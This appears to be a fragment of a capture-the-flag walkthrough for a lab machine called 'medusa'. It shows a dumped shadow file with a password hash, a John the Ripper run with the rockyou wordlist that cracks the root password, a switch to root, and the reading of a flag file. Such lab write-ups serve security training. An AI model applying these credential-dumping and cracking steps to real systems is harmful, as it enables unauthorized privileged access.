games:*:19372:0:99999:7:::
man:*:19372:0:99999:7:::
lp:*:19372:0:99999:7:::
mail:*:19372:0:99999:7:::
news:*:19372:0:99999:7:::
uucp:*:19372:0:99999:7:::
proxy:*:19372:0:99999:7:::
www-data:*:19372:0:99999:7:::
backup:*:19372:0:99999:7:::
list:*:19372:0:99999:7:::
irc:*:19372:0:99999:7:::
gnats:*:19372:0:99999:7:::
nobody:*:19372:0:99999:7:::
_apt:*:19372:0:99999:7:::
systemd-network:*:19372:0:99999:7:::
systemd-resolve:*:19372:0:99999:7:::
messagebus:*:19372:0:99999:7:::
systemd-timesync:*:19372:0:99999:7:::
sshd:*:19372:0:99999:7:::
spectre:$y$j9T$4TeFHbjRqRC9royagYTTJ/$KnU7QK1u0/5fpHHqE/ehPe6uqpwbs6vuvcQQH4EF9ZB:19374:0:99999:7:::
systemd-coredump:!*:19372::::::
ftp:*:19372:0:99999:7:::
----------------------------separator--------
❯ vi hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
andromeda (root)
1g 0:00:00:09 DONE (2025-02-22 17:39) 0.1016g/s 380.4p/s 380.4c/s 380.4C/s 19871987..street
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
spectre@medusa:~$ su root
Password:
root@medusa:/home/spectre# cd ~
root@medusa:~# ls -al
total 28
drwx------ 3 root root 4096 Jan 30 2023 .
drwxr-xr-x 19 root root 4096 Jan 15 2023 ..
lrwxrwxrwx 1 root root 9 Jan 15 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3526 Jan 17 2023 .bashrc
drwxr-xr-x 3 root root 4096 Jan 15 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r--r-- 1 root root 53 Jan 18 2023 .rO0t.txt
-rw-r--r-- 1 root root 66 Jan 30 2023 .selected_editor
root@medusa:~# cat .rO0t.txt
congrats hacker :)

34b1e6fc5e7fe0bfd56ed4b8776c9f5b
